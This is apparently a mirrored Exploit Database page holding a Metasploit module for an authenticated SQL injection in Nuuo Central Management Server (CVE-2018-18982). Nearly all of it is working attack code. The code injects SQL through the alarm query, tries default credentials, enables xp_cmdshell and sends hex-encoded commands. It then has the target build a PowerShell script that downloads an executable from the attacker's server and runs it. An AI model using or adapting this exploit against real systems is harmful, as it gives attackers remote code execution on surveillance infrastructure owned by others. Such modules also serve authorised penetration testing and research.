Nuuo Central Management – (Authenticated) SQL Server SQL Injection (Metasploit)

• Exploit Database
• 11 阅读

• 作者： Metasploit
  日期： 2019-02-22
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46449/

• ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::Nuuo
  include Msf::Exploit::Remote::HttpServer
  
  def initialize(info={})
  super(update_info(info,
  'Name'=> 'Nuuo Central Management Authenticated SQL Server SQLi',
  'Description' => %q{
  The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
  This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
  installed by default, xp_cmdshell can be enabled and abused to achieve code execution.
  This module will either use a provided session number (which can be guessed with an auxiliary
  module) or attempt to login using a provided username and password - it will also try the
  default credentials if nothing is provided.
  },
  'License' => MSF_LICENSE,
  'Author'=>
  [
  'Pedro Ribeiro <pedrib@gmail.com>'# Vulnerability discovery and Metasploit module
  ],
  'References'=>
  [
  [ 'CVE', '2018-18982' ],
  [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
  [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
  [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
  
  ],
  'Platform'=> 'win',
  'Arch'=> ARCH_X86,
  'Stance'=> Msf::Exploit::Stance::Aggressive,# we need this to run in the foreground
  'Targets' =>
  [
  [ 'Nuuo Central Management Server <= v2.10.0', {} ],
  ],
  'Notes' =>
  {
  'SideEffects' => [ ARTIFACTS_ON_DISK ]
  },
  'Privileged'=> false,# we run as NETWORK_SERVICE
  'DisclosureDate'=> 'Oct 11 2018',
  'DefaultTarget' => 0))
  register_options [
  Opt::RPORT(5180),
  OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),
  OptString.new('URIPATH', [true,'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])
  ]
  end
  
  
  def inject_sql(sql, final = false)
  sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
  if final
  nucs_send_msg_async(sql)
  else
  nucs_send_msg(sql)
  end
  end
  
  # Handle incoming requests from the server
  def on_request_uri(cli, request)
  unless @pl
  print_error("A request came in, but the payload wasn't ready yet!")
  return
  end
  print_good('Sending the payload to CMS...')
  send_response(cli, @pl)
  
  Rex.sleep(3)
  
  print_status('Executing shell...')
  inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
  register_file_for_cleanup("c:/windows/temp/#{@filename}")
  end
  
  def create_hex_cmd(cmd)
  var = rand_text_alpha(2)
  hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x"
  cmd.each_byte { |b|
  hex_cmd << b.to_i.to_s(16)
  }
  hex_cmd << "; exec (@#{var})"
  end
  
  def primer
  # we need to roll our own here instead of using the MSSQL mixins
  # (tried that and it doesn't work)
  service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"
  print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
  @filename = "#{rand_text_alpha_lower(8..10)}.exe"
  ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"
  download_pl = %{xp_cmdshell }
  download_pl << %{'cd C:\\windows\\temp\\ && }
  download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }
  download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }
  download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }
  download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }
  download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}
  
  print_status('Injecting PowerShell payload')
  inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
  register_file_for_cleanup("c:/windows/temp/#{ps1}")
  end
  
  def exploit
  nucs_login
  
  unless @nucs_session
  fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
  end
  
  @pl = generate_payload_exe
  
  #do not use SSL
  if datastore['SSL']
  ssl_restore = true
  datastore['SSL'] = false
  end
  
  begin
  Timeout.timeout(datastore['HTTPDELAY']) {super}
  rescue Timeout::Error
  datastore['SSL'] = true if ssl_restore
  end
  end
  end